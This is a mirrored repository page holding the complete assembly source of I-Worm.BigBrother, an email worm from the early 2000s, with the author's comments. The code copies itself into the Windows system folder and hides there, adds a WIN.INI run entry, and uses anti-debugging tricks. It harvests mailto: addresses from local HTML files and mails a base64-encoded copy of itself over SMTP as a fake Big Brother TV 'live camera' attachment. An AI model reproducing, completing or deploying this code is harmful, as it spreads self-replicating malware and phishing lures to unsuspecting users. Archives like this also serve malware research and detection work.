Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-16 12:08:36 +00:00
Code Releases Activity
d2cfd8ca7b
vxug-MalwareSourceCode/Win32/I-Worm.BigBrother.asm
vxunderground 4528c5fb12
Add files via upload
2020-10-09 22:25:52 -05:00

1555 lines
30 KiB
NASM
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;================================================================================================
; :æÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄæ:
; Ä #####################++++++++++++++++++ Ä
; Ä #:I-Worm.BigBrother #¿ ! ¿+ Ä
; Ä ####################*################## Ä
; Ä +¿ ! ¿#:BioCoded by YuP # Ä
; Ä ++++++++++++++++++++################### Ä
; :æÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄæ:
;
;
;
;
; [Disclaimer]
; ^~^~^~^~^~^~^
; This file is a demonstration of WINASM coding. Educational purposes only!
; Author is not responsabile of any kind of damages which may occur after the
; asembly of this file.
; I TAKE NO RESPONSIBILITY FOR ANY ACTIONS WITH THIS CODE.
;
; [2002 CURRENT NOTES]
; This worm is so old that i don't remember when i have coded it,
; it is VERY VERY LAME! IT WAS CODED IN THIS TIMES WHEN I THOUHGT
; THAT WINASM = API CALL! AND YOU WILL SEE IT IN A SOURCE!
; SO IT IS GOOD FOR LAMMIEZ!
;
; Ad added 28.06.2002 - by Lord YuP / TKT - templars.org - tkt.planetsecurity.net
; [current greetz for all guyz from #virus and TKT memberz!]
;
;
;
;
; [Greetz]
; ^~^~^^~^
; Big thx goez to: * Dageshi (#VXERS) - you helped me a lot ;>.
; * T-2000 / Immortal Riot (4 base encoder sample).
;
; Otherz (pozdrufka) to: detergent, blaze, b0sman, Exeq, Fidiasz , Duszek, Kwaz,
; tompaw69, PlayerPL, Grabarz (dragon bratha)
; Crash and otherz polish coderz.
;
; Bonus thx to: Dla Karolinki (z BB) -jestes tak glupia ,ze mi cie szkoda.
; (natchnienie) Ricky Martin ;P, Renegat, Rino Reinz, Ciuny, Palguma,
; Balon.
;
; Thx 4 payload txt to: Linkin Park (R) KeWl Music Group
;
; [How to Compile]
; ^~^~^~^~^~^~^~^
; %: tasm32 /m1 /mx big.asm
; %: tlink32 /Tpe /aa big,big,,import32.lib
; %: brc32 big.res
;
; % NOTE. File is also compressed & encrypted by tElock tool ,ver.051
;
;
;
; [Info]
; ^~^~^~
; .:[SUPPORT.AVX.COM]: (my commentz in *[]*)
;
;
;
; Details:
;---------
;Name : I-Worm.BigBrother
;Type: Internet Worm
;Aliases: none
;Size: 12800 bytes
;
;At the time of writing this we have only received one report of infection.
;
;
;Description:
;---------------
;This is a virus which arrives in your e-mail in the following formatt:
;
;From: "BIGBROTHER TVN POLSKA" bigbrother@bigbrother.tvn.com.pl
;Subject: BIGBROTHER SHOW !
;
;Body: Teraz mozesz ogladac BIGBROTHER SHOW za pomoca komputera! Jak to
;zrobic? Wystarczy ze uruchomisz specjalny program
;(BIGBROTHER_LIVE_CAMERA.EXE) , ktory zostal dolaczony do wiadomosci.
;Ponadto za pomoca tego narzedzia mozesz nominowac wybrane przez ciebie
;osoby, do opuszczenia domu Wielkiego Brata. Co miesiac rozlosowane beda
;nagrody (telewizory, wieze stereo,
;komputery ...i wiele ,wiele innych). Prosimy przysylac
;opinie i komentarze na temat programu.
;
;
;Zyczymy milej zabawy:
;
;Redakcja programu.
;
;Attachment: BigBrother_Live_Camera.exe
;
;When the user opens the attachment, the virus copies itself to C:\WINDOWS\SYSTEM with the name: ;b1g_brother.exe
;and adds the following line in WIN.INI: in the section [windows]
;
;run=c:\Windows\System\b1g_brother.exe
;
;After that it checks if the computer is connected to the Internet and then starts sending itself ;through e-mail in the format presented above.
;
;In order to get e-mail addresses it scans all hard drives for html files and it search inside ;them for the string mailto:, and it sends itself to those addresses. *[no in hd but in
;My Documents folder na Temp]*
;
;In case of running the b1g_brother.exe manually it shows the following message:
;SEGMENTATION FAULT.
;Please REPORT this BUG.
;
;Payload:
;-----------
;On May 13 it displays the following message:
;You like to think youÆre never wrong
;You want to act like youÆre someone
;You want someone to hurt like you
;You want to share what youÆve been through
;You live what you learn...
;
;Today you know the truth: i-worm.BigBrother
;Now contact with yourz AV expert.
;Future , Don't trust anyone ...
; [YuP/0ne Earth]
;payyes *[what?]*
;Detection has been added.
;
;
;
;
; [Bugz]
; ^~^~^~
; This i-worm should be able to work on win32 platformz without any erroz. Opps ;) it should be.
; On win98 (when i and dageshi were testing it) were some bugz (win98 fuck out).
; I don't know why ;) i don't have any time to check it with any debugER ;]
; do it yourself if you want of coz. This is my 1st i-worm and its very
; 'low-coded' i think ... The next onez should be better.
;
;
;================================================================================================
; [L]etz [S]tart
; oO-= Have fun! =-Oo
;================================================================================================
.486p
locals
jumps
.model flat,STDCALL
extrn ExitProcess:PROC ;i love it
extrn CopyFileA:PROC ;did i miss sth ?
extrn MessageBoxA:PROC
extrn SetFileAttributesA:PROC
extrn GetSystemDirectoryA:PROC
extrn lstrcatA:PROC
extrn lstrcpyA:PROC
extrn CreateFileA:PROC
extrn ExitWindowsEx:PROC
extrn Sleep:PROC
extrn CreateMutexA:PROC
extrn GetCurrentProcessId:PROC
extrn LoadLibraryA:PROC
extrn GetProcAddress:PROC
extrn PeekMessageA:PROC
extrn OpenMutexA:PROC
extrn RegOpenKeyExA:PROC
extrn RegQueryValueExA:PROC
extrn RegCloseKey:PROC
extrn FindFirstFileA:PROC
extrn FindNextFileA:PROC
extrn CreateFileA:PROC
extrn CloseHandle:PROC
extrn ReadFile:proc
extrn CharNextA:PROC
extrn lstrcpyn:PROC
extrn lstrlenA:PROC
extrn lstrcmp:PROC
extrn lstrcpy:PROC
extrn FindClose:PROC
extrn GetTopWindow:PROC
extrn GetNextWindowA:PROC
extrn PostMessageA:PROC
extrn GetActiveWindow:PROC
extrn GetTempPathA:PROC
extrn send:PROC
extrn recv:PROC
extrn WSAStartup:PROC
extrn WSACleanup:PROC
extrn socket:proc
extrn connect:PROC
extrn gethostbyname:PROC
extrn closesocket:PROC
extrn lstrlen:PROC
extrn WinExec:PROC
extrn lstrcmpi:PROC
extrn ReleaseMutex:PROC
extrn GetFileSize:PROC
extrn WriteFile:PROC
extrn GetModuleFileNameA:PROC
extrn GetCurrentDirectoryA:PROC
extrn _lread:PROC
extrn SetCurrentDirectoryA:PROC
extrn WriteProfileStringA:PROC
extrn RegCreateKeyA:PROC
extrn RegOpenKeyA:PROC
;extrnz for payload
extrn SetTextColor:PROC
extrn GetDC:PROC
extrn TextOutA:PROC
extrn CreateFontA:PROC
extrn SelectObject:PROC
extrn LineTo:PROC
extrn GetSystemTime:PROC
extrn SetBkColor:PROC
extrn CreatePen:PROC
.DATA
signature db "[I-WORM.BigBr0th3r] (c) YuP",0
db "Greetz to all #PHREAKPL CREW",0
db "and #VXERS TERRORIST GROUP.",0
db "Special thx goez to: Dageshi",0
db "& detergent ",0
db "-=* GOOD WORK AV PEOPLE ;P *=-",0
myname db 256 dup(?)
new db '\b1g_brother.exe',0
sysD db 256 dup(?)
sysDD db 256 dup(?)
tempD db 256 dup(?)
markerr db 'rundll32 kernel,FatalExit',0
krnl db 'KERNEL32.DLL',0
krnl_proc db 'RegisterServiceProcess',0
mutex_name db 'Kakaroth',0
mutexH dd ?
sys_name db 'b1g_brother.exe',0
module_filename db 256 dup(?)
dir db 1024 dup(?)
bslash db '\',0
;check connection
hang_connection db 'InternetHangUp',0
check_connection db 'InternetGetConnectedState',0
wininet_lib db 'WININET.DLL',0
lpdwFlagz dd 0
ini_key db 'run',0
ini_sect db 'windows',0
;FOR REGISTRY
HKEY_LOCAL_MACHINE equ 80000001h
HKEY_CURRENT_USER equ 80000001h
hKeyPath db 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',0
hPersonal db 'Personal',0
PersonalF db 128 dup(0)
PersonalFsize dd 128
hKeyHandle dd 0
my_key db 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\silent_thunder',0
shit dd 0
shitshit dd 0
server_p db 'Software\Microsoft\Internet Account Manager\Accounts\00000001',0
server_h dd 0
server_s db 'SMTP Server',0
server db 128 dup(0)
server_size dd 128
;FOR SEARCH
fMASK db '\*.htm*',0
fMASK1 db '*.htm*',0
break db '\',0
oldd dd 128 dup(0)
bus db 260 dup(0) ;search buffer ;]
fsH dd ?
fHnd dd ?
sciezka db 260 dup(0)
WIN32_FIND_DATA struc
dwFileAttributes dd 0
dwLowDateTime0 dd ? ; creation
dwHigDateTime0 dd ?
dwLowDateTime1 dd ? ; last access
dwHigDateTime1 dd ?
dwLowDateTime2 dd ? ; last write
dwHigDateTime2 dd ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved dd 0,0
cFileName db 260 dup(0)
cAlternateFilename db 14 dup(0)
db 2 dup(0)
WIN32_FIND_DATA ends
find_data WIN32_FIND_DATA <?>
;for e-mailz
mail db 'mailto:',0
worm_size equ 10000h
worm_code db worm_size dup(0)
fH dd ?
searchH dd ?
counter equ 0
longBuff dd ?
clear db '',0
myB db 128 dup(?)
L1 db '"',0
mail_string db 128 dup(0)
mail_good db 128 dup(0)
sep db '',0
;======================[BASE ENCODE DATA]===============================
base_file db '00000b.rat',0
base_file_name db 128 dup(0)
base_to_code db '000000s.b64',0
base_to_code_buff db 128 dup(0)
Encoding_Table: DB 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
DB 'abcdefghijklmnopqrstuvwxyz'
DB '0123456789+/'
Input_Buffer DB 200 DUP(0)
Output_Buffer DB 200 DUP(0)
base_buff_size equ 18516
base_buffer DB base_buff_size DUP(0)
base_size dd 0
baL dd ?
input_handle dd ?
Input_Handle dd ?
output_handle dd ?
Output_Handle dd ?
IO_Bytes_Count DD 0
OPEN_EXISTING EQU 00000003h
CREATE_ALWAYS EQU 00000002h
FILE_ATTRIBUTE_NORMAL EQU 00000080h
GENERIC_READ EQU 80000000h
GENERIC_WRITE EQU 40000000h
;============[E-MAIL CLIEN7]========================
HELO db 'HELO bigbrother.r0x.pl',0dh,0ah
mime_code db 'From: "BIGBROTHER TVN POLSKA" <bigbrother@bigbrother.tvn.com.pl>',0dh,0ah
db 'Subject: BIGBROTHER SHOW !',0dh,0ah
db 'MIME-Version: 1.0',0dh,0ah
db 'Content-Type: multipart/mixed; boundary="a1234"',0dh,0ah
db 0dh,0ah,'--a1234',0dh,0ah
db 'Content-Type: text/plain; charset=us-ascii',0dh,0ah
db 'Content-Transfer-Encoding: 7bit',0dh,0ah,0dh,0ah
db 0dh,0ah
db 'Teraz mozesz ogladac BIGBROTHER SHOW za pomoca komputera! Jak to',0dh,0ah
db 'zrobic? Wystarczy ze uruchomisz specjalny program',0dh,0ah
db '(BIGBROTHER_LIVE_CAMERA.EXE) , ktory zostal dolaczony do wiadomosci.',0dh,0ah
db 'Ponadto za pomoca tego narzedzia mozesz nominowac wybrane przez ciebie',0dh,0ah
db 'osoby, do opuszczenia domu Wielkiego Brata. Co miesiac rozlosowane beda',0dh,0ah
db 'nagrody (telewizory, wieze stereo,',0dh,0ah
db 'komputery ...i wiele ,wiele innych). Prosimy przysylac',0dh,0ah
db 'opinie i komentarze na temat programu.',0dh,0ah
db 0dh,0ah
db 0dh,0ah
db 'Zyczymy milej zabawy:',0dh,0ah
db 0dh,0ah
db 'Redakcja programu.',0dh,0ah
db '',0dh,0ah
db 0dh,0ah
db 0dh,0ah,'--a1234',0dh,0ah
db 'Content-Type: application/octet-stream; name="BigBrother_Live_Camera.exe"'
db 0dh,0ah,'Content-Transfer-Encoding: base64',0dh,0ah
db 'Content-Disposition: attachment; filename="BigBrother_Live_Camera.exe"',0dh,0ah,0dh,0ah
mime_end db 0dh,0ah,'--a1234--',0dh,0ah,0dh,0ah,0
mime_e equ mime_end
dot db '.',0dh,0ah
RCPT_1 db 'RCPT TO:<',0
RCPT_ENDD db '>',0dh,0ah,0
RCPT db 160 dup (?)
MAIL_FROM db 'MAIL FROM:<bigbrohter@tvn.pl>',0dh,0ah
QUIT db 'QUIT',0dh,0ah
_DATA_ db 'DATA',0dh,0ah
e_end db '',0
;==================================[END MAIL DATA]====================================
;==================================[WIN SOCKZ]========================================
addr struc
proto dw 2
port dw 1900h
ip db 127,0,0,1
addr ends
addr2 addr <>
sock dd ?
SOCK_STREAM EQU 1
AF_INET EQU 2
WSA_Data DB 400 DUP(0)
SOCKET_ERR equ -1
HOSTENT_IP equ 10h
rB dd ?
;==================[END WIN SOCKZ]=========================================
;============[END E-MAIL DATA]=============================================
;FOR STEALTH
err_title db 'Setup',0
markerror db 'Segmentation fault.',0dh,0ah,0dh,0ah
db 'Please REPORT this BUG.',0
db 0dh,0ah,0
;PAYLOAD
;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*
;===========[PAYL0AD ;))]==================================================
dcH dd ?
brH dd ?
fontH dd ? ;~^~^~^~^~^~^~^^~^~^~^~^
info_line_1 db "You like to think youre never wrong",0 ;some lyrics from:
info_line_2 db "You want to act like youre someone",0 ;'POINTS OF AUTHORITY' - song
info_line_3 db "You want someone to hurt like you",0 ;of my best music group -
info_line_4 db "You want to share what youve been through",0 ;[L]inkin [P]ark ;))
info_line_5 db "You live what you learn...",0 ;~^~^~^~^~^~^~^~^~^~^~^~^
info_line_6 db "Today you know the truth: i-worm.BigBrother",0 ;some txt from myself
info_line_7 db 'Now contact with yourz AV expert.',0
info_line_8 db "Future , Don't trust anyone ... [YuP/0ne Earth]",0
sysTimeStruct db 16 dup(0)
payday db 128 dup(0)
payyes db 'payyes',0
;===========[END PAY DATA]=================================================
;-------------------------------------------------------------------------*
;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*
;-------------------------------------------------------------------------*
;===========[CODE SECTION]=================================================
.CODE
Kakaroth:
push 256
push offset module_filename
push 0
call GetModuleFileNameA
xor ebp,ebp
mov ebp,offset module_filename
push offset dir
push 256
call GetCurrentDirectoryA
push offset bslash
push offset dir
call lstrcatA
push offset dir
call lstrlen
mov edi,eax
sub ecx,edi
C_NEXT:
push ebp
call CharNextA
mov ebp,eax
dec edi
jnz C_NEXT
push ecx
push ebp
push offset myname
call lstrcpyn
@DEBUG_CODE:
lea eax,dword ptr [esp-8h]
xor esi,esi
xchg eax,dword ptr fs:[esi]
lea edi,exception
push edi
push eax
call @antidebug
@antidebug:
add esp,4
cmp esi,dword ptr fs:[esi+20h]
je @SKIP_DEBUG
jmp @HEART_STOPS
@SKIP_DEBUG:
push 0
push 0
push 0
push 0
push 0
call PeekMessageA
@COPY_FILE:
push 256
push offset sysD
call GetSystemDirectoryA
xor eax,eax
push offset new
push offset sysD
call lstrcatA
cmp eax,0
jc @EXIT
push 0
push offset sysD
push offset myname
call CopyFileA
cmp eax,0
jc @EXIT
push 01h OR 02h
push offset sysD
call SetFileAttributesA
push offset myname
push offset sys_name
call lstrcmpi
cmp eax,0
jne @RUN_SYS_FILE
@_CHECK_4_PAYLOAD:
push offset sysTimeStruct
call GetSystemTime
xor eax,eax
lea eax,sysTimeStruct
cmp word ptr [eax+2],5 ; 13th May
jne @SKIP_PAY
cmp word ptr [eax+6],13
jne @SKIP_PAY
@PAY: ;payload
push 50000 ;sp00ky one ;))
call Sleep ;wait some time
push 0h
call GetDC
mov dword ptr [dcH],eax
push 0
push 1000h
push 1
call CreatePen
mov dword ptr [brH],eax
push dword ptr [brH]
push dword ptr [dcH]
call SelectObject
push 500
push 300
push dword ptr [dcH]
call LineTo
;=======[FONT]=================================================
push 0h
push 0h
push 0h
push 0h
push 0h
push 0h
push 0h
push 0h
push 0h
push 0
push 0
push 13
push 23
call CreateFontA
mov dword ptr [fontH],eax
push dword ptr [fontH]
push dword ptr [dcH]
call SelectObject
push 0
push dword ptr [dcH]
call SetBkColor
push 16777215 ;color - white
push dword ptr [dcH]
call SetTextColor
;======[END FONT]===========================================
@TEXT:
push 16777215
push dword ptr [dcH]
call SetTextColor
mov esi,160
mov edx,offset info_line_1
mov ecx,140
call @TEXT_OUT
mov edx,offset info_line_2
mov ecx,170
call @TEXT_OUT
mov edx,offset info_line_3
mov ecx,200
call @TEXT_OUT
mov edx,offset info_line_4
mov ecx,230
call @TEXT_OUT
mov edx,offset info_line_5
mov ecx,260
call @TEXT_OUT
mov esi,160
mov edx,offset info_line_6
mov ecx,350
call @TEXT_OUT
mov esi,160
mov edx,offset info_line_7
mov ecx,380
call @TEXT_OUT
mov esi,160
mov edx,offset info_line_8
mov ecx,435
call @TEXT_OUT
push offset payyes
push offset payday
call lstrcatA
call @SKIP_PAY
@TEXT_OUT: ;text-out function
push edx
call lstrlenA
push eax
push edx
push ecx
push esi
push dword ptr [dcH]
call TextOutA
ret
@SKIP_PAY:
@RESIDENT:
push offset mutex_name ;am i in memory now ?
push 0
push 1
call OpenMutexA
cmp eax,0
jne @I_WAS_HERE
je @NEXT_
@I_WAS_HERE:
push 010h
push offset err_title
push offset markerror
push 0h
call MessageBoxA
push 0h
call ExitProcess
@NEXT_:
push offset mutex_name ;nop then go there
push 1
push 0
call CreateMutexA
mov dword ptr [mutexH],eax
xor edx,edx
xor eax,eax
push offset krnl
call LoadLibraryA
cmp eax,0
jc @EXIT
push offset krnl_proc
push eax
call GetProcAddress
or eax,eax
jz @PR
mov edx,eax
call GetCurrentProcessId
;push 1
;push eax
;call edx
@PR:
push offset sysD
push offset ini_key
push offset ini_sect
call WriteProfileStringA
call @GET_MAILZ_START
@GET_MAILZ_START:
xor eax,eax
push offset hKeyHandle
push 0
push 0
push offset hKeyPath
push HKEY_LOCAL_MACHINE
call RegOpenKeyExA
cmp eax,0
jne @EXIT
push offset PersonalFsize
push offset PersonalF
push 0
push 0
push offset hPersonal
push hKeyHandle
call RegQueryValueExA
push offset server_h
push 0
push 0
push offset server_p
push HKEY_CURRENT_USER
call RegOpenKeyExA
cmp eax,0
jne @EXIT
push offset server_size
push offset server
push 0
push 0
push offset server_s
push server_h
call RegQueryValueExA
;PersonalF -> like My Docz
push hKeyHandle
call RegCloseKey
push offset base_file_name
push 260
call GetTempPathA
push offset base_file
push offset base_file_name
call lstrcatA
;=======================[BASE ENCODER]==========================
;Thx goez to: * T-2000 / Immortal Riot (4 base encoder sample) +
; * dageshi (4 everything) +
;===============================================================
@_BASE_ENCODER:
push offset base_to_code_buff ;copy source file
push 260
call GetTempPathA
push offset base_to_code
push offset base_to_code_buff
call lstrcatA
push 1
push offset base_to_code_buff
push offset sysD
call CopyFileA
;ble ble ble
XOR EBX, EBX
PUSH EBX
PUSH FILE_ATTRIBUTE_NORMAL
PUSH OPEN_EXISTING
PUSH EBX
PUSH EBX
PUSH GENERIC_READ
PUSH OFFSET base_to_code_buff
CALL CreateFileA
MOV [Input_Handle], EAX
PUSH EBX
PUSH FILE_ATTRIBUTE_NORMAL
PUSH CREATE_ALWAYS
PUSH EBX
PUSH EBX
PUSH GENERIC_WRITE
push OFFSET base_file_name
CALL CreateFileA
MOV [Output_Handle], EAX
PUSH 0 ;wpiszem standard
PUSH OFFSET IO_Bytes_Count
PUSH (offset mime_end-offset mime_code)
push offset mime_code
PUSH [Output_Handle]
CALL WriteFile
cmp eax,0
je @ERROR
PUSH EBX ;size
PUSH [Input_Handle]
CALL GetFileSize
CDQ
MOV ECX, (76/4)*3
DIV ECX
DEC EDX
JS No_Round
INC EAX
No_Round:
XCHG ECX, EAX
Encode_Line:
PUSH ECX
MOV ESI, OFFSET Input_Buffer
PUSH 0
PUSH OFFSET IO_Bytes_Count
PUSH (76/4)*3
PUSH ESI
PUSH [Input_Handle]
CALL ReadFile
MOV EDI, OFFSET Output_Buffer
PUSH EDI
PUSH 76/4
POP ECX
Encode_Packet:
PUSH ECX
MOV CL, 8
LODSB
SHL EAX, CL
LODSB
SHL EAX, CL
LODSB
SHL EAX, CL
MOV EBX, OFFSET Encoding_Table
MOV CL, 4
Encode_Byte:
SHR EAX, 2
ROL EAX, 8
XLAT
STOSB
LOOP Encode_Byte
POP ECX
LOOP Encode_Packet
MOV WORD PTR [EDI], 0A0Dh ; <CRLF>.
POP EAX
PUSH 0
PUSH OFFSET IO_Bytes_Count
PUSH 78
PUSH EAX
PUSH [Output_Handle]
CALL WriteFile
POP ECX
LOOP Encode_Line
push [Output_Handle]
call CloseHandle
;=====================================================[END BASE ENCODER]===========
;=====================================================[GET BASE CODE TO BUFF]======
@GET_BASE_CODE:
push 00000000h
push 00000080h
push 00000003h
push 00000000h
push 00000001h
push 80000000h
push offset base_file_name
call CreateFileA
mov edi,eax
push 0
push edi
call GetFileSize
push 0
push offset baL
push eax
push offset base_buffer
push edi
call ReadFile
;=====================================================[END GETTING]===============
@NEXT__:
push offset shitshit
push offset my_key
push HKEY_LOCAL_MACHINE
call RegOpenKeyA
cmp eax,0
je @EXIT
push offset shit
push offset my_key
push HKEY_LOCAL_MACHINE
call RegCreateKeyA
mov bh,0
mov bl,0
CALL @SCAN_MYDOCZ
@SCAN_TEMP:
push offset tempD
push 260
call GetTempPathA
push offset clear
push offset bus
call lstrcpyA
push offset tempD
push offset bus
call lstrcpyA
push offset fMASK1 ;add
push offset bus
call lstrcatA
call @FIND_1st
call @GO_GO1
@SCAN_MYDOCZ:
xor edi,edi
push offset clear
push offset bus
call lstrcpyA
push offset PersonalF
push offset bus
call lstrcpyA
push offset fMASK ;add
push offset bus
call lstrcatA
call @FIND_1st
call @GO_GO
@FIND_1st:
push offset find_data
push offset bus
call FindFirstFileA
mov dword ptr [searchH],eax
cmp eax,-1
je @ERROR
ret
@CLEAR_PATH:
push offset clear
push offset sciezka
call lstrcpyA
ret
@GO_GO:
call @CLEAR_PATH
xor edi,edi
push offset PersonalF
push offset sciezka
call lstrcatA
push offset break
push offset sciezka
call lstrcatA
push offset find_data.cFileName
push offset sciezka
call lstrcatA
xor edi,edi
mov edi,offset sciezka
call @SCAN_HTM_FILE_STEP1
@GO_GO1:
call @CLEAR_PATH
xor edi,edi
push offset tempD
push offset sciezka
call lstrcatA
push offset break
push offset sciezka
call lstrcatA
push offset find_data.cFileName
push offset sciezka
call lstrcatA
xor edi,edi
mov edi,offset sciezka
call @SCAN_HTM_FILE_STEP1
@SCAN_HTM_FILE_STEP1:
push 00000000h
push 00000080h
push 00000003h
push 00000000h
push 00000001h
push 80000000h
push edi
call CreateFileA
cmp eax,-1
je @ERROR_M
mov dword ptr [fH],eax
push 0h
push offset longBuff
push worm_size ;size
push offset worm_code
push dword ptr [fH]
call ReadFile
cmp eax,0
je @ERROR_M
call @CLEAR
@MARK:
xor esi,esi
mov esi,0
xor ebp,ebp
mov ebp,offset worm_code
xor edi,edi
mov edi,1
@ALGORITM:
xor edi,edi
mov edi,1
call LOOPING_JOE
push offset L1
push offset myB
call lstrcmp
cmp eax,0
je @CH
inc esi
cmp esi,10000
ja @END_OF_FILE
call @ALGORITM
@CH:
call @CLEAR
call @CHECK_STRING
LOOPING_JOE:
push ebp
call CharNextA
mov ebp,eax
push 2
push ebp
push offset myB
call lstrcpyn
ret
@CHECK_STRING:
call LOOPING_JOE
push offset myB
push offset mail_string
call lstrcatA
inc esi
inc edi
cmp edi,8
jne @CHECK_STRING
je @IS_IT_GOD
@IS_IT_GOD:
push offset mail
push offset mail_string
call lstrcmp
cmp eax,0
je @GET_MAIL
jne @ALGORITM
@GET_MAIL:
call LOOPING_JOE
push offset L1
push offset myB
call lstrcmp
cmp eax,0
je @END_MAIL
push offset myB
push offset mail_good
call lstrcatA
inc esi
cmp esi,1000
jne @GET_MAIL
@END_MAIL: ;TU GEN MAIL
inc bl
cmp bl,10
ja @ERROR
call @SEND_MAIL
@NEXT_MAILL:
xor edi,edi
mov edi,1
call @ALGORITM
@END_OF_FILE:
push dword ptr [fH]
call CloseHandle
xor eax,eax
xor ebp,ebp
call @CLEAR
call @CLEAR_BUFF
call @FIND_NEXT_FILE
@CLEAR:
push offset sep
push offset mail_good
call lstrcpy
push offset sep
push offset mail_string
call lstrcpy
ret
@CLEAR_BUFF:
push offset sep
push offset worm_code
call lstrcpy
ret
exception:
xor esi,esi
mov eax,dword ptr fs:[esi]
mov esp,dword ptr [eax]
@FIND_NEXT_FILE:
push offset find_data
push dword ptr [searchH]
call FindNextFileA
cmp eax,0
je @ERROR_NO_FILEZ_LEFT
cmp bh,1
ja @GO_TO_GO1
call @GO_GO
@GO_TO_GO1:
call @GO_GO1
@ERROR:
push dword ptr [fHnd]
call CloseHandle
call @EXIT
@ERROR_M:
push dword ptr [searchH]
call FindClose
call @EXIT
@ERROR_NO_FILEZ_LEFT:
cmp bh,2
je @ERROR_M
ja @ERROR_M
add bh,2
push dword ptr [searchH]
call FindClose
call @SCAN_TEMP
@SEND_MAIL:
push offset RCPT_1
push offset RCPT
call lstrcatA
push offset mail_good
push offset RCPT
call lstrcatA
push offset RCPT_ENDD
push offset RCPT
call lstrcatA
;======[CHECK INTERNET STATE]=======
;WININET.DLL REQUIRED :> +
;===================================
@CHECK_CONN:
push 500 ;little stealth
call Sleep
push offset wininet_lib
call LoadLibraryA
push offset check_connection
push eax
call GetProcAddress
xchg eax,ecx
jecxz @INIT_W
;push 0
;push offset lpdwFlagz
;call ecx
;or eax,eax
;jz @CHECK_CONN
;======[INIT WINSOCK]================
@INIT_W:
push offset WSA_Data
PUSH 0101h
CALL WSAStartup
cmp eax,0
jne @EXIT
push 0
push SOCK_STREAM
push AF_INET
call socket
cmp eax,SOCKET_ERR
je @CLEAN
mov sock,eax
;======[CONNECT]=====================
;push offset server
;call gethostbyname
;cmp eax,0
;je @CLEAN
;mov eax,dword ptr [eax+HOSTENT_IP]
;mov eax,dword ptr [eax]
;mov dword ptr [addr2.ip],eax
push 16
push offset addr2
push sock
call connect
cmp ax,SOCKET_ERR
je @CLEAN
;======[READ AND SEND LOOP]==========
push 20
call Sleep
push 0
push 512
push offset rB
push sock
call recv
push 0
push 24
push offset HELO
push sock
call send
push 20
call Sleep
push 0
push 512
push offset rB
push sock
call recv
push 0
push 31
push offset MAIL_FROM
push sock
call send
push 20
call Sleep
push 0
push 512
push offset rB
push sock
call recv
push offset RCPT
call lstrlen
push 0
push eax
push offset RCPT
push sock
call send
push 20
call Sleep
push 0
push 512
push offset rB
push sock
call recv
push 0
push 6
push offset _DATA_
push sock
call send
push 20
call Sleep
push 0
push 512
push offset rB
push sock
call recv
push offset base_buffer
call lstrlen
push 0
push eax
push offset base_buffer
push sock
call send
push 0
push 3
push offset dot
push sock
call send
push 20
call Sleep
push 0
push 512
push offset rB
push sock
call recv
push 0
push 6
push offset QUIT
push sock
call send
push sock
call closesocket
call WSACleanup
push offset sep
push offset RCPT
call lstrcpy
push 5000
call Sleep
call @NEXT_MAILL
@EX:
push sock
call closesocket
push 0h
call ExitProcess
@CLEAN:
call WSACleanup
push 0h
call @EXIT
@EXIT:
push offset payday
push offset payyes
call lstrcmp
cmp eax,0
je @HANG_ALL_CONNECTIoNZ
jne _STAY_IN_MEM
_STAY_IN_MEM:
push 50000
call Sleep
call _STAY_IN_MEM
@BUFFER_OVERFLOW:
call GetActiveWindow ;zabijamy aktywne okno przypuszczalnie debugger
mov edx,eax ;nieskonczona petla powoduje blad w kernelu
push 0 ;plik robaka bedzie dostepny po resecie systemu ;))
push 0
push 12h
push edx
call PostMessageA
CALL @BUFFER_OVERFLOW
@HEART_STOPS:
push 1
push offset markerr
call WinExec
push 100
call Sleep
call @BUFFER_OVERFLOW
@RUN_SYS_FILE:
push 256
push offset sysDD
call GetSystemDirectoryA
push offset sysDD
call SetCurrentDirectoryA
push 500
call Sleep
push 1
push offset sysD
call WinExec
push dword ptr [mutexH]
call ReleaseMutex
push 0h
call ExitProcess
@HANG_ALL_CONNECTIoNZ:
push 500 ;timer
call Sleep
push offset wininet_lib
call LoadLibraryA
push offset hang_connection
push eax
call GetProcAddress
xchg eax,ecx
push 0h ;kiss me goodbye ;)
push offset lpdwFlagz ;I don`t know that this WININET
call ecx ;function is working ;) Refer
call @HANG_ALL_CONNECTIoNZ ;to Jacob Navia it should be.
;[*Nice 'WININET' Ref ;) Big Thx :*]
End Kakaroth
;================================================================================================
; +1679 linez of asm c0de ;)) ? I did it ? he he ...
;
;================================================================================================
;***** This is the end of your jurney... Sorry about commentz...i know - my english skillz. *****
;================================================================================================
; eEEEEEe nNn Nn dDDDd #+
; EE NNnN nN Dd dD #+
; EEEe nN nN nN dD dD #+
; EE NN nN nN Dd dD #+
; eEEEEEe nN nNNn dDDDd #+
; #+
; -= .: CoDinG is No7 a CrIm3 :. =- #+
;================================================================================================
View Git Blame Copy Permalink